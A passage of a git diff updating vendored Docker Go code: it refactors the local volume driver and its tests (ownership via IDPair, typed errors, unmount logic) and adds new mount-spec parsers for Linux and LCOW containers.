"github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/utils" "github.com/docker/docker/volume" + "github.com/pkg/errors" ) // VolumeDataPathName is the name of the directory where the volume data is stored. 
@@ -36,17 +35,9 @@ var ( // volumeNameRegex ensures the name assigned for the volume is valid. // This name is used to create the bind directory, so we need to avoid characters that // would make the path to escape the root directory. - volumeNameRegex = utils.RestrictedNamePattern + volumeNameRegex = names.RestrictedNamePattern ) -type validationError struct { - error -} - -func (validationError) IsValidationError() bool { - return true -} - type activeMount struct { count uint64 mounted bool @@ -55,10 +46,10 @@ type activeMount struct { // New instantiates a new Root instance with the provided scope. Scope // is the base path that the Root instance uses to store its // volumes. The base path is created here if it does not exist. -func New(scope string, rootUID, rootGID int) (*Root, error) { +func New(scope string, rootIDs idtools.IDPair) (*Root, error) { rootDirectory := filepath.Join(scope, volumesPathName) - if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(rootDirectory, 0700, rootIDs); err != nil { return nil, err } @@ -66,8 +57,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { scope: scope, path: rootDirectory, volumes: make(map[string]*localVolume), - rootUID: rootUID, - rootGID: rootGID, + rootIDs: rootIDs, } dirs, err := ioutil.ReadDir(rootDirectory) @@ -75,11 +65,6 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { return nil, err } - mountInfos, err := mount.GetMounts() - if err != nil { - logrus.Debugf("error looking up mounts for local volume cleanup: %v", err) - } - for _, d := range dirs { if !d.IsDir() { continue @@ -105,12 +90,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { } // unmount anything that may still be mounted (for example, from an unclean shutdown) - for _, info := range mountInfos { - if info.Mountpoint == v.path { - mount.Unmount(v.path) - break - } - } + mount.Unmount(v.path) } } @@ -125,8 +105,7 @@ type Root struct 
{ scope string path string volumes map[string]*localVolume - rootUID int - rootGID int + rootIDs idtools.IDPair } // List lists all the volumes @@ -167,11 +146,8 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error } path := r.DataPath(name) - if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil { - if os.IsExist(err) { - return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path)) - } - return nil, errors.Wrapf(err, "error while creating volume path '%s'", path) + if err := idtools.MkdirAllAndChown(path, 0755, r.rootIDs); err != nil { + return nil, errors.Wrapf(errdefs.System(err), "error while creating volume path '%s'", path) } var err error @@ -197,7 +173,7 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error return nil, err } if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil { - return nil, errors.Wrap(err, "error while persisting volume options") + return nil, errdefs.System(errors.Wrap(err, "error while persisting volume options")) } } @@ -215,7 +191,15 @@ func (r *Root) Remove(v volume.Volume) error { lv, ok := v.(*localVolume) if !ok { - return fmt.Errorf("unknown volume type %T", v) + return errdefs.System(errors.Errorf("unknown volume type %T", v)) + } + + if lv.active.count > 0 { + return errdefs.System(errors.Errorf("volume has active mounts")) + } + + if err := lv.unmount(); err != nil { + return err } realPath, err := filepath.EvalSymlinks(lv.path) @@ -227,7 +211,7 @@ func (r *Root) Remove(v volume.Volume) error { } if !r.scopedPath(realPath) { - return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath) + return errdefs.System(errors.Errorf("Unable to remove a directory outside of the local volume root %s: %s", r.scope, realPath)) } if err := removePath(realPath); err != nil { @@ -243,7 +227,7 @@ func removePath(path string) error { if os.IsNotExist(err) { return nil } 
- return errors.Wrapf(err, "error removing volume path '%s'", path) + return errdefs.System(errors.Wrapf(err, "error removing volume path '%s'", path)) } return nil } @@ -264,12 +248,20 @@ func (r *Root) Scope() string { return volume.LocalScope } +type validationError string + +func (e validationError) Error() string { + return string(e) +} + +func (e validationError) InvalidParameter() {} + func (r *Root) validateName(name string) error { if len(name) == 1 { - return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")} + return validationError("volume name is too short, names should be at least two alphanumeric characters") } if !volumeNameRegex.MatchString(name) { - return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)} + return validationError(fmt.Sprintf("%q includes invalid characters for a local volume name, only %q are allowed. If you intended to pass a host directory, use absolute path", name, names.RestrictedNameChars)) } return nil } @@ -305,14 +297,20 @@ func (v *localVolume) Path() string { return v.path } +// CachedPath returns the data location +func (v *localVolume) CachedPath() string { + return v.path +} + // Mount implements the localVolume interface, returning the data location. +// If there are any provided mount options, the resources will be mounted at this point func (v *localVolume) Mount(id string) (string, error) { v.m.Lock() defer v.m.Unlock() if v.opts != nil { if !v.active.mounted { if err := v.mount(); err != nil { - return "", err + return "", errdefs.System(err) } v.active.mounted = true } @@ -321,19 +319,35 @@ func (v *localVolume) Mount(id string) (string, error) { return v.path, nil } -// Umount is for satisfying the localVolume interface and does not do anything in this driver. 
+// Unmount dereferences the id, and if it is the last reference will unmount any resources +// that were previously mounted. func (v *localVolume) Unmount(id string) error { v.m.Lock() defer v.m.Unlock() + + // Always decrement the count, even if the unmount fails + // Essentially docker doesn't care if this fails, it will send an error, but + // ultimately there's nothing that can be done. If we don't decrement the count + // this volume can never be removed until a daemon restart occurs. if v.opts != nil { v.active.count-- - if v.active.count == 0 { - if err := mount.Unmount(v.path); err != nil { - v.active.count++ - return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path) + } + + if v.active.count > 0 { + return nil + } + + return v.unmount() +} + +func (v *localVolume) unmount() error { + if v.opts != nil { + if err := mount.Unmount(v.path); err != nil { + if mounted, mErr := mount.Mounted(v.path); mounted || mErr != nil { + return errdefs.System(errors.Wrapf(err, "error while unmounting volume path '%s'", v.path)) } - v.active.mounted = false } + v.active.mounted = false } return nil } @@ -341,7 +355,7 @@ func (v *localVolume) Unmount(id string) error { func validateOpts(opts map[string]string) error { for opt := range opts { if !validOpts[opt] { - return validationError{fmt.Errorf("invalid option key: %q", opt)} + return validationError(fmt.Sprintf("invalid option key: %q", opt)) } } return nil @@ -356,7 +370,7 @@ func getAddress(opts string) string { optsList := strings.Split(opts, ",") for i := 0; i < len(optsList); i++ { if strings.HasPrefix(optsList[i], "addr=") { - addr := (strings.SplitN(optsList[i], "=", 2)[1]) + addr := strings.SplitN(optsList[i], "=", 2)[1] return addr } } diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go index f5a519b883..4cb47ba045 100644 --- a/vendor/github.com/docker/docker/volume/local/local_test.go +++ 
b/vendor/github.com/docker/docker/volume/local/local_test.go @@ -1,4 +1,4 @@ -package local +package local // import "github.com/docker/docker/volume/local" import ( "io/ioutil" @@ -9,7 +9,9 @@ import ( "strings" "testing" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" + "gotest.tools/skip" ) func TestGetAddress(t *testing.T) { @@ -29,18 +31,14 @@ func TestGetAddress(t *testing.T) { } func TestRemove(t *testing.T) { - // TODO Windows: Investigate why this test fails on Windows under CI - // but passes locally. - if runtime.GOOS == "windows" { - t.Skip("Test failing on Windows CI") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: investigate why this test fails on CI") rootDir, err := ioutil.TempDir("", "local-volume-test") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -82,7 +80,7 @@ func TestInitializeWithVolumes(t *testing.T) { } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -92,7 +90,7 @@ func TestInitializeWithVolumes(t *testing.T) { t.Fatal(err) } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -114,7 +112,7 @@ func TestCreate(t *testing.T) { } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -151,7 +149,7 @@ func TestCreate(t *testing.T) { } } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -180,16 +178,15 @@ func TestValidateName(t *testing.T) { } func TestCreateWithOpts(t *testing.T) { - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" 
{ - t.Skip() - } + skip.If(t, runtime.GOOS == "windows") + skip.If(t, os.Getuid() != 0, "requires mounts") rootDir, err := ioutil.TempDir("", "local-volume-test") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -214,33 +211,27 @@ func TestCreateWithOpts(t *testing.T) { } }() - mountInfos, err := mount.GetMounts() + mountInfos, err := mount.GetMounts(mount.SingleEntryFilter(dir)) if err != nil { t.Fatal(err) } - - var found bool - for _, info := range mountInfos { - if info.Mountpoint == dir { - found = true - if info.Fstype != "tmpfs" { - t.Fatalf("expected tmpfs mount, got %q", info.Fstype) - } - if info.Source != "tmpfs" { - t.Fatalf("expected tmpfs mount, got %q", info.Source) - } - if !strings.Contains(info.VfsOpts, "uid=1000") { - t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) - } - if !strings.Contains(info.VfsOpts, "size=1024k") { - t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) - } - break - } + if len(mountInfos) != 1 { + t.Fatalf("expected 1 mount, found %d: %+v", len(mountInfos), mountInfos) } - if !found { - t.Fatal("mount not found") + info := mountInfos[0] + t.Logf("%+v", info) + if info.Fstype != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Fstype) + } + if info.Source != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Source) + } + if !strings.Contains(info.VfsOpts, "uid=1000") { + t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) + } + if !strings.Contains(info.VfsOpts, "size=1024k") { + t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) } if v.active.count != 1 { @@ -270,7 +261,7 @@ func TestCreateWithOpts(t *testing.T) { t.Fatal("expected mount to still be active") } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: 0, GID: 0}) if err != nil { t.Fatal(err) } @@ -285,14 
+276,14 @@ func TestCreateWithOpts(t *testing.T) { } } -func TestRealodNoOpts(t *testing.T) { +func TestRelaodNoOpts(t *testing.T) { rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -320,7 +311,7 @@ func TestRealodNoOpts(t *testing.T) { t.Fatal(err) } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go index fb08862cef..b1c68b931b 100644 --- a/vendor/github.com/docker/docker/volume/local/local_unix.go +++ b/vendor/github.com/docker/docker/volume/local/local_unix.go @@ -1,15 +1,18 @@ -// +build linux freebsd solaris +// +build linux freebsd // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. 
-package local +package local // import "github.com/docker/docker/volume/local" import ( "fmt" "net" + "os" "path/filepath" "strings" + "syscall" + "time" "github.com/pkg/errors" @@ -85,3 +88,12 @@ func (v *localVolume) mount() error { err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts) return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts) } + +func (v *localVolume) CreatedAt() (time.Time, error) { + fileInfo, err := os.Stat(v.path) + if err != nil { + return time.Time{}, err + } + sec, nsec := fileInfo.Sys().(*syscall.Stat_t).Ctim.Unix() + return time.Unix(sec, nsec), nil +} diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go index 1bdb368a0f..d96fc0f594 100644 --- a/vendor/github.com/docker/docker/volume/local/local_windows.go +++ b/vendor/github.com/docker/docker/volume/local/local_windows.go @@ -1,12 +1,15 @@ // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. 
-package local +package local // import "github.com/docker/docker/volume/local" import ( "fmt" + "os" "path/filepath" "strings" + "syscall" + "time" ) type optsConfig struct{} @@ -32,3 +35,12 @@ func setOpts(v *localVolume, opts map[string]string) error { func (v *localVolume) mount() error { return nil } + +func (v *localVolume) CreatedAt() (time.Time, error) { + fileInfo, err := os.Stat(v.path) + if err != nil { + return time.Time{}, err + } + ft := fileInfo.Sys().(*syscall.Win32FileAttributeData).CreationTime + return time.Unix(0, ft.Nanoseconds()), nil +} diff --git a/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go new file mode 100644 index 0000000000..bafb7b07f8 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go @@ -0,0 +1,34 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "path" + + "github.com/docker/docker/api/types/mount" +) + +var lcowSpecificValidators mountValidator = func(m *mount.Mount) error { + if path.Clean(m.Target) == "/" { + return ErrVolumeTargetIsRoot + } + if m.Type == mount.TypeNamedPipe { + return errors.New("Linux containers on Windows do not support named pipe mounts") + } + return nil +} + +type lcowParser struct { + windowsParser +} + +func (p *lcowParser) ValidateMountConfig(mnt *mount.Mount) error { + return p.validateMountConfigReg(mnt, rxLCOWDestination, lcowSpecificValidators) +} + +func (p *lcowParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + return p.parseMountRaw(raw, volumeDriver, rxLCOWDestination, false, lcowSpecificValidators) +} + +func (p *lcowParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, rxLCOWDestination, false, lcowSpecificValidators) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/linux_parser.go b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go new file mode 100644 
index 0000000000..8e436aec0e --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go @@ -0,0 +1,417 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "fmt" + "path" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" +) + +type linuxParser struct { +} + +func linuxSplitRawSpec(raw string) ([]string, error) { + if strings.Count(raw, ":") > 2 { + return nil, errInvalidSpec(raw) + } + + arr := strings.SplitN(raw, ":", 3) + if arr[0] == "" { + return nil, errInvalidSpec(raw) + } + return arr, nil +} + +func linuxValidateNotRoot(p string) error { + p = path.Clean(strings.Replace(p, `\`, `/`, -1)) + if p == "/" { + return ErrVolumeTargetIsRoot + } + return nil +} +func linuxValidateAbsolute(p string) error { + p = strings.Replace(p, `\`, `/`, -1) + if path.IsAbs(p) { + return nil + } + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) +} +func (p *linuxParser) ValidateMountConfig(mnt *mount.Mount) error { + // there was something looking like a bug in existing codebase: + // - validateMountConfig on linux was called with options skipping bind source existence when calling ParseMountRaw + // - but not when calling ParseMountSpec directly... 
nor when the unit test called it directly + return p.validateMountConfigImpl(mnt, true) +} +func (p *linuxParser) validateMountConfigImpl(mnt *mount.Mount, validateBindSourceExists bool) error { + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := linuxValidateNotRoot(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + if err := linuxValidateAbsolute(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 && len(linuxPropagationModes) > 0 { + if _, ok := linuxPropagationModes[opts.Propagation]; !ok { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := linuxValidateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + if validateBindSourceExists { + exists, _, _ := currentFileInfoProvider.fileInfo(mnt.Source) + if !exists { + return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)} + } + } + + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + case mount.TypeTmpfs: + if len(mnt.Source) != 0 { + return &errMountConfig{mnt, errExtraField("Source")} + } + if _, err := p.ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { + return &errMountConfig{mnt, err} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} + +// read-write modes +var 
rwModes = map[string]bool{ + "rw": true, + "ro": true, +} + +// label modes +var linuxLabelModes = map[string]bool{ + "Z": true, + "z": true, +} + +// consistency modes +var linuxConsistencyModes = map[mount.Consistency]bool{ + mount.ConsistencyFull: true, + mount.ConsistencyCached: true, + mount.ConsistencyDelegated: true, +} +var linuxPropagationModes = map[mount.Propagation]bool{ + mount.PropagationPrivate: true, + mount.PropagationRPrivate: true, + mount.PropagationSlave: true, + mount.PropagationRSlave: true, + mount.PropagationShared: true, + mount.PropagationRShared: true, +} + +const linuxDefaultPropagationMode = mount.PropagationRPrivate + +func linuxGetPropagation(mode string) mount.Propagation { + for _, o := range strings.Split(mode, ",") { + prop := mount.Propagation(o) + if linuxPropagationModes[prop] { + return prop + } + } + return linuxDefaultPropagationMode +} + +func linuxHasPropagation(mode string) bool { + for _, o := range strings.Split(mode, ",") { + if linuxPropagationModes[mount.Propagation(o)] { + return true + } + } + return false +} + +func linuxValidMountMode(mode string) bool { + if mode == "" { + return true + } + + rwModeCount := 0 + labelModeCount := 0 + propagationModeCount := 0 + copyModeCount := 0 + consistencyModeCount := 0 + + for _, o := range strings.Split(mode, ",") { + switch { + case rwModes[o]: + rwModeCount++ + case linuxLabelModes[o]: + labelModeCount++ + case linuxPropagationModes[mount.Propagation(o)]: + propagationModeCount++ + case copyModeExists(o): + copyModeCount++ + case linuxConsistencyModes[mount.Consistency(o)]: + consistencyModeCount++ + default: + return false + } + } + + // Only one string for each mode is allowed. 
+ if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 || consistencyModeCount > 1 { + return false + } + return true +} + +func (p *linuxParser) ReadWrite(mode string) bool { + if !linuxValidMountMode(mode) { + return false + } + + for _, o := range strings.Split(mode, ",") { + if o == "ro" { + return false + } + } + return true +} + +func (p *linuxParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + arr, err := linuxSplitRawSpec(raw) + if err != nil { + return nil, err + } + + var spec mount.Mount + var mode string + switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if linuxValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. e.g. /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = arr[0] + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = arr[0] + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + + if !linuxValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + if path.IsAbs(spec.Source) { + spec.Type = mount.TypeBind + } else { + spec.Type = mount.TypeVolume + } + + spec.ReadOnly = !p.ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mount.TypeVolume { + spec.VolumeOptions = &mount.VolumeOptions{ + DriverConfig: &mount.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mount.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + if linuxHasPropagation(mode) { + spec.BindOptions = &mount.BindOptions{ + Propagation: linuxGetPropagation(mode), + } + } + + mp, err := p.parseMountSpec(spec, false) + if mp != nil { + mp.Mode = mode + } + if err != nil 
{ + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} +func (p *linuxParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, true) +} +func (p *linuxParser) parseMountSpec(cfg mount.Mount, validateBindSourceExists bool) (*MountPoint, error) { + if err := p.validateMountConfigImpl(&cfg, validateBindSourceExists); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: path.Clean(filepath.ToSlash(cfg.Target)), + Type: cfg.Type, + Spec: cfg, + } + + switch cfg.Type { + case mount.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = p.DefaultCopyMode() + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mount.TypeBind: + mp.Source = path.Clean(filepath.ToSlash(cfg.Source)) + if cfg.BindOptions != nil && len(cfg.BindOptions.Propagation) > 0 { + mp.Propagation = cfg.BindOptions.Propagation + } else { + // If user did not specify a propagation mode, get + // default propagation mode. + mp.Propagation = linuxDefaultPropagationMode + } + case mount.TypeTmpfs: + // NOP + } + return mp, nil +} + +func (p *linuxParser) ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if !linuxValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + // For now don't allow propagation properties while importing + // volumes from data container. These volumes will inherit + // the same propagation property as of the original volume + // in data container. This probably can be relaxed in future. 
+ if linuxHasPropagation(mode) { + return "", "", errInvalidMode(mode) + } + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +func (p *linuxParser) DefaultPropagationMode() mount.Propagation { + return linuxDefaultPropagationMode +} + +func (p *linuxParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) { + var rawOpts []string + if readOnly { + rawOpts = append(rawOpts, "ro") + } + + if opt != nil && opt.Mode != 0 { + rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) + } + + if opt != nil && opt.SizeBytes != 0 { + // calculate suffix here, making this linux specific, but that is + // okay, since API is that way anyways. + + // we do this by finding the suffix that divides evenly into the + // value, returning the value itself, with no suffix, if it fails. + // + // For the most part, we don't enforce any semantic to this values. + // The operating system will usually align this and enforce minimum + // and maximums. 
+ var ( + size = opt.SizeBytes + suffix string + ) + for _, r := range []struct { + suffix string + divisor int64 + }{ + {"g", 1 << 30}, + {"m", 1 << 20}, + {"k", 1 << 10}, + } { + if size%r.divisor == 0 { + size = size / r.divisor + suffix = r.suffix + break + } + } + + rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) + } + return strings.Join(rawOpts, ","), nil +} + +func (p *linuxParser) DefaultCopyMode() bool { + return true +} +func (p *linuxParser) ValidateVolumeName(name string) error { + return nil +} + +func (p *linuxParser) IsBackwardCompatible(m *MountPoint) bool { + return len(m.Source) > 0 || m.Driver == volume.DefaultDriverName +} + +func (p *linuxParser) ValidateTmpfsMountDestination(dest string) error { + if err := linuxValidateNotRoot(dest); err != nil { + return err + } + return linuxValidateAbsolute(dest) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/mounts.go b/vendor/github.com/docker/docker/volume/mounts/mounts.go new file mode 100644 index 0000000000..8f255a5482 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/mounts.go @@ -0,0 +1,170 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + "os" + "path/filepath" + "syscall" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" +) + +// MountPoint is the intersection point between a volume and a container. It +// specifies which volume is to be used and where inside a container it should +// be mounted. +// +// Note that this type is embedded in `container.Container` object and persisted to disk. +// Changes to this struct need to by synced with on disk state. +type MountPoint struct { + // Source is the source path of the mount. + // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. 
+ Source string + // Destination is the path relative to the container root (`/`) to the mount point + // It is where the `Source` is mounted to + Destination string + // RW is set to true when the mountpoint should be mounted as read-write + RW bool + // Name is the name reference to the underlying data defined by `Source` + // e.g., the volume name + Name string + // Driver is the volume driver used to create the volume (if it is a volume) + Driver string + // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount + Type mounttypes.Type `json:",omitempty"` + // Volume is the volume providing data to this mountpoint. + // This is nil unless `Type` is set to `TypeVolume` + Volume volume.Volume `json:"-"` + + // Mode is the comma separated list of options supplied by the user when creating + // the bind/volume mount. + // Note Mode is not used on Windows + Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" + + // Propagation describes how the mounts are propagated from the host into the + // mount point, and vice-versa. + // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt + // Note Propagation is not used on Windows + Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string + + // Specifies if data should be copied from the container before the first mount + // Use a pointer here so we can tell if the user set this value explicitly + // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated + CopyData bool `json:"-"` + // ID is the opaque ID used to pass to the volume driver. + // This should be set by calls to `Mount` and unset by calls to `Unmount` + ID string `json:",omitempty"` + + // Sepc is a copy of the API request that created this mount. 
+ Spec mounttypes.Mount + + // Track usage of this mountpoint + // Specifically needed for containers which are running and calls to `docker cp` + // because both these actions require mounting the volumes. + active int +} + +// Cleanup frees resources used by the mountpoint +func (m *MountPoint) Cleanup() error { + if m.Volume == nil || m.ID == "" { + return nil + } + + if err := m.Volume.Unmount(m.ID); err != nil { + return errors.Wrapf(err, "error unmounting volume %s", m.Volume.Name()) + } + + m.active-- + if m.active == 0 { + m.ID = "" + } + return nil +} + +// Setup sets up a mount point by either mounting the volume if it is +// configured, or creating the source directory if supplied. +// The, optional, checkFun parameter allows doing additional checking +// before creating the source directory on the host. +func (m *MountPoint) Setup(mountLabel string, rootIDs idtools.IDPair, checkFun func(m *MountPoint) error) (path string, err error) { + defer func() { + if err != nil || !label.RelabelNeeded(m.Mode) { + return + } + + var sourcePath string + sourcePath, err = filepath.EvalSymlinks(m.Source) + if err != nil { + path = "" + err = errors.Wrapf(err, "error evaluating symlinks from mount source %q", m.Source) + return + } + err = label.Relabel(sourcePath, mountLabel, label.IsShared(m.Mode)) + if err == syscall.ENOTSUP { + err = nil + } + if err != nil { + path = "" + err = errors.Wrapf(err, "error setting label on mount source '%s'", sourcePath) + } + }() + + if m.Volume != nil { + id := m.ID + if id == "" { + id = stringid.GenerateNonCryptoID() + } + path, err := m.Volume.Mount(id) + if err != nil { + return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) + } + + m.ID = id + m.active++ + return path, nil + } + + if len(m.Source) == 0 { + return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") + } + + if m.Type == mounttypes.TypeBind { + // Before creating the source directory on the host, invoke checkFun if 
it's not nil. One of + // the use case is to forbid creating the daemon socket as a directory if the daemon is in + // the process of shutting down. + if checkFun != nil { + if err := checkFun(m); err != nil { + return "", err + } + } + // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) + // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it + if err := idtools.MkdirAllAndChownNew(m.Source, 0755, rootIDs); err != nil { + if perr, ok := err.(*os.PathError); ok { + if perr.Err != syscall.ENOTDIR { + return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source) + } + } + } + } + return m.Source, nil +} + +// Path returns the path of a volume in a mount point. +func (m *MountPoint) Path() string { + if m.Volume != nil { + return m.Volume.Path() + } + return m.Source +} + +func errInvalidMode(mode string) error { + return errors.Errorf("invalid mode: %v", mode) +} + +func errInvalidSpec(spec string) error { + return errors.Errorf("invalid volume specification: '%s'", spec) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/parser.go b/vendor/github.com/docker/docker/volume/mounts/parser.go new file mode 100644 index 0000000000..73681750ea --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/parser.go @@ -0,0 +1,47 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "runtime" + + 